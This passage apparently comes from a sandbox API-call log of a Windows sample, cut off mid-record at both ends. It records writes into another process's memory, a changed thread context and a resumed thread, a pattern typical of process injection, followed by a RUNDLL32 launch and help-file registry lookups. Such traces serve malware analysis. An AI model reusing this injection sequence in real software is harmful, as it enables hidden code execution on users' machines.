[33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x401478, Ebp=0x0, Eip=0x771401c4, SegCs=0x23, EFlags=0x202, Esp=0x18fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0069.687] NtWriteVirtualMemory (in: ProcessHandle=0xbc, BaseAddress=0x7efde008, Buffer=0x230004*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x0 | out: Buffer=0x230004*, NumberOfBytesWritten=0x0) returned 0x0 [0069.687] SetErrorMode (uMode=0x8001) returned 0x8001 [0069.687] LoadLibraryA (lpLibFileName="ntdll") returned 0x77130000 [0069.687] SetErrorMode (uMode=0x8001) returned 0x8001 [0069.687] GetProcAddress (hModule=0x77130000, lpProcName="NtSetContextThread") returned 0x77151910 [0069.687] NtSetContextThread (ThreadHandle=0xb4, Context=0x23009c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x403986, Ebp=0x0, Eip=0x771401c4, SegCs=0x23, EFlags=0x202, Esp=0x18fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0069.688] SetErrorMode (uMode=0x8001) returned 0x8001 [0069.688] LoadLibraryA (lpLibFileName="ntdll") returned 0x77130000 [0069.688] SetErrorMode (uMode=0x8001) returned 0x8001 [0069.688] GetProcAddress (hModule=0x77130000, lpProcName="NtResumeThread") returned 0x77150058 [0069.688] NtResumeThread (in: ThreadHandle=0xb4, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0069.688] SetErrorMode (uMode=0x8001) returned 0x8001 [0069.688] LoadLibraryA (lpLibFileName="kernel32") returned 0x76c20000 [0069.688] SetErrorMode (uMode=0x8001) returned 0x8001 [0069.688] GetProcAddress (hModule=0x76c20000, lpProcName="GetExitCodeProcess") returned 0x76c4174d [0069.688] GetExitCodeProcess (in: hProcess=0xbc, lpExitCode=0x18fb6c | out: lpExitCode=0x18fb6c*=0x103) returned 1 [0069.688] GetLastError () returned 0x715 [0069.689] RaiseException (dwExceptionCode=0xc000008f, dwExceptionFlags=0x1, nNumberOfArguments=0x2, lpArguments=0x18fb4c) [0069.691] RtlUnwind (TargetFrame=0x18fbc8, TargetIp=0x72a43caf, ExceptionRecord=0x0, ReturnValue=0x0) [0069.691] SysStringLen (param_1="Open") returned 0x4 [0069.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Open", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0069.692] LoadLibraryA (lpLibFileName="c:\\windows\\system32\\shell32") returned 0x75fd0000 [0075.418] SetErrorMode (uMode=0x8001) returned 0x8001 [0075.418] GetProcAddress (hModule=0x75fd0000, lpProcName="ShellExecuteExA") returned 0x76216fdd [0075.460] ShellExecuteExA (in: pExecInfo=0x18fc10*(cbSize=0x3c, fMask=0x0, hwnd=0xa9c, lpVerb="Open", lpFile="RUNDLL32", lpParameters="shell32,ShellExecute", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x18fc10*(cbSize=0x3c, fMask=0x0, hwnd=0xa9c, lpVerb="Open", lpFile="RUNDLL32", lpParameters="shell32,ShellExecute", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0083.391] GetLastError () returned 0x0 [0083.391] SysStringByteLen (bstr="灏湥") returned 0x4 [0083.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798c4, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0083.391] PostThreadMessageA (idThread=0xa48, Msg=0x1069, wParam=0x0, lParam=0x0) returned 1 [0083.391] GetCurrentProcessId () returned 0xa44 [0083.392] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632148 [0083.392] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635668 [0083.392] PeekMessageA (in: lpMsg=0x18fe58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fe58) returned 1 [0083.392] TranslateMessage (lpMsg=0x18fe58) returned 0 [0083.392] DispatchMessageA (lpMsg=0x18fe58) returned 0x0 [0083.392] GetCurrentThreadId () returned 0xa48 [0083.392] GetCurrentThreadId () returned 0xa48 [0083.393] GetCurrentThreadId () returned 0xa48 [0083.393] PostMessageA (hWnd=0x50122, Msg=0x0, wParam=0x0, lParam=0x0) returned 1 [0083.393] SafeArrayDestroyDescriptor (psa=0x57d830) returned 0x0 [0083.393] SafeArrayDestroyDescriptor (psa=0x583bd8) returned 0x0 [0083.393] SafeArrayDestroyDescriptor (psa=0x5881b8) returned 0x0 [0083.393] SafeArrayDestroyDescriptor (psa=0x5883e8) returned 0x0 [0083.393] FreeLibrary (hLibModule=0x76c20000) returned 1 [0083.393] FreeLibrary (hLibModule=0x76c20000) returned 1 [0083.393] FreeLibrary (hLibModule=0x76c20000) returned 1 [0083.393] FreeLibrary (hLibModule=0x74f40000) returned 1 [0083.393] FreeLibrary (hLibModule=0x76c20000) returned 1 [0083.393] FreeLibrary (hLibModule=0x76c20000) returned 1 [0083.394] FreeLibrary (hLibModule=0x76c20000) returned 1 [0083.394] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0083.394] GetCurrentThreadId () returned 0xa48 [0083.394] PeekMessageA (in: lpMsg=0x18fe58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fe58) returned 1 [0083.394] IsWindow (hWnd=0x50122) returned 1 [0083.394] GetWindowLongA (hWnd=0x50122, nIndex=-16) returned -1811349504 [0083.394] GetParent (hWnd=0x50122) returned 0x0 [0083.394] TranslateMessage (lpMsg=0x18fe58) returned 0 [0083.394] DispatchMessageA (lpMsg=0x18fe58) returned 0x0 [0083.394] NtdllDefWindowProc_A (hWnd=0x50122, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0083.394] SendMessageA (hWnd=0x50122, Msg=0x1050, wParam=0x0, lParam=0x0) returned 0x0 [0083.394] GetCurrentThreadId () returned 0xa48 [0083.394] lstrcpyA (in: lpString1=0x18f97c, lpString2="" | out: lpString1="") returned="" [0083.394] lstrlenA (lpString="") returned 0 [0083.394] lstrcpyA (in: lpString1=0x18f774, lpString2="" | out: lpString1="") returned="" [0083.395] lstrcpynA (in: lpString1=0x18f34c, lpString2="", iMaxLength=260 | out: lpString1="") returned="" [0083.395] lstrlenA (lpString="") returned 0 [0083.395] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x1) returned 0x263a880 [0083.395] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x1) returned 0x263a890 [0083.395] lstrcpyA (in: lpString1=0x263a880, lpString2="" | out: lpString1="") returned="" [0083.395] lstrlenA (lpString="") returned 0 [0083.395] lstrlenA (lpString=".HLP") returned 4 [0083.395] lstrcpyA (in: lpString1=0x18f468, lpString2="" | out: lpString1="") returned="" [0083.395] lstrcatA (in: lpString1="", lpString2=".HLP" | out: lpString1=".HLP") returned=".HLP" [0083.395] lstrcpynA (in: lpString1=0x18f22c, lpString2=".HLP", iMaxLength=260 | out: lpString1=".HLP") returned=".HLP" [0083.395] lstrlenA (lpString=".HLP") returned 4 [0083.395] RtlReAllocateHeap (Heap=0x2620000, Flags=0x0, Ptr=0x263a880, Size=0x5) returned 0x263a880 [0083.395] RtlReAllocateHeap (Heap=0x2620000, Flags=0x0, Ptr=0x263a890, Size=0x5) returned 0x263a890 [0083.395] lstrcpyA (in: lpString1=0x263a880, lpString2=".HLP" | out: lpString1=".HLP") returned=".HLP" [0083.395] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x105) returned 0x263a8a0 [0083.395] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x5) returned 0x263a9b0 [0083.395] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f31c | out: phkResult=0x18f31c*=0xec) returned 0x0 [0083.395] RegOpenKeyExA (in: hKey=0xec, lpSubKey="HTML Help", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f320 | out: phkResult=0x18f320*=0x1ec) returned 0x0 [0083.395] RegQueryValueExA (in: hKey=0x1ec, lpValueName=".HLP", lpReserved=0x0, lpType=0x0, lpData=0x263a8a0, lpcbData=0x18f318*=0x104 | out: lpType=0x0, lpData=0x263a8a0*=0xc4, lpcbData=0x18f318*=0x104) returned 0x2 [0083.396] RegCloseKey (hKey=0x1ec) returned 0x0 [0083.396] RegCloseKey (hKey=0xec) returned 0x0 [0083.396] GetPrivateProfileStringA (in: lpAppName="FILES", lpKeyName=".HLP", lpDefault="", lpReturnedString=0x263a8a0, nSize=0x104, lpFileName="WINHELP.INI" | out: lpReturnedString="") returned 0x0 [0083.396] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x263a8a0 | out: hHeap=0x2620000) returned 1 [0083.396] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x263a9b0 | out: hHeap=0x2620000) returned 1 [0083.396] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x105) returned 0x263a8a0 [0083.396] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x5) returned 0x263a9b0 [0083.396] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f31c | out: phkResult=0x18f31c*=0xec) returned 0x0 [0083.396] RegOpenKeyExA (in: hKey=0xec, lpSubKey="Help", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f320 | out: phkResult=0x18f320*=0x0) returned 0x2 [0083.396] RegCloseKey (hKey=0xec) returned 0x0 [0083.396] GetPrivateProfileStringA (in: lpAppName="FILES", lpKeyName=".HLP", lpDefault="", lpReturnedString=0x263a8a0, nSize=0x104, lpFileName="WINHELP.INI" | out: lpReturnedString="") returned 0x0 [0083.396] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x263a8a0 | out: hHeap=0x2620000) returned 1 [0083.396] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x263a9b0 | out: hHeap=0x2620000) returned 1 [0083.397] lstrcpynA (in: 